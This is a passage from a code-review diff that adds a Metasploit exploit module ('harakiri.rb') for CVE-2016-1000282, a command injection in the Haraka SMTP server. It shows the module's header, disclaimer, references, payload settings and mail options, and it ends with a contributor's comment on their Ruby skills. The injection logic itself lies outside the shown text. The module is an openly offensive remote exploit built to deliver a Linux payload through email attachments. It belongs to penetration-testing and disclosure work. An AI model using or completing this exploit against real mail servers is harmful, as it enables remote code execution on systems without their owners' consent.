modules/exploits/linux/smtp/harakiri.rb

```diff
@@ -0,0 +1,256 @@
+# Exploit github: http://github.com/outflankbv/Exploits/
+# Vulnerable version link: https://github.com/haraka/Haraka/releases/tag/v2.8.8
+# Version:  <= Haraka 2.8.8 (with attachment plugin enabled)
+# Tested on: Should be OS independent tested on Ubuntu 16.04.1 LTS
+# Tested versions: 2.8.8 and 2.7.2
+# CVE : CVE-2016-1000282
+# Credits to: smfreegard for finding and reporting the vulnerability
+# Thanks to: Dexlab.nl for asking me to look at Haraka.
+#
+# Disclaimer:
+# This software has been created purely for the purposes of academic research and
+# for the development of effective defensive techniques, and is not intended to be
+# used to attack systems except where explicitly authorized. Project maintainers
+# are not responsible or liable for misuse of the software. Use responsibly.
+#
+# This is to be considered a responsible disclosure due to the availability of an effective patch.
+#
+#this code is based on:
+# https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/smtp/exim4_dovecot_exec.rb
+
+require 'msf/core'
+require 'base64'
+require 'zip'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Smtp
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Haraka Command Injection (used for Linux Payload download)',
+      'Description'    => %q{
+        This module exploits a command injection vulnerability in Haraka < 2.8.9 with
+        attachment plugin enabled and working.
+      },
+      'Author'         =>
+        [
+          'xychix / Mark, Outflank' # Exploit-DB python exploit and msf module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2016-1000282'],
+          [ 'URL', 'https://github.com/outflankbv/Exploits/blob/master/harakiri-CVE-2016-1000282.py'],
+          [ 'URL', 'https://www.exploit-db.com/exploits/41162/'],
+          [ 'URL', 'https://github.com/distributedweaknessfiling/DWF-Database-Artifacts/blob/158c10cf11bc7d6ad728c1a8dd213f523ecfca52/DWF/2016/1000282/CVE-2016-1000282.json'],
+          [ 'EDB-ID', '41162']
+        ],
+      'Privileged'     => false,
+      'Arch'           => ARCH_X86,
+      'Platform'       => 'Linux',
+      'Payload'        =>
+        {
+          'DisableNops' => true
+        },
+      'Targets'        =>
+        [
+          [ 'Linux x86', { }],
+        ],
+      'DisclosureDate' => 'Jan 25 2017',
+      'DefaultTarget'  => 0))
+
+      register_options(
+      [
+        OptString.new('EHLO', [ true, 'TO address of the e-mail', 'haraka.test']),
+        OptString.new('MAILTO', [ true, 'TO address of the e-mail', 'root@haraka.test']),
+        OptString.new('MAILFROM', [ true, 'FROM address of the e-mail', 'harakiri@exploit.db']),
```

Comment:
Will be combined with other changes in ~2 weeks as I really don't code ruby at all and even have to google for basic string manipulations. (as noted in CmdStager issues)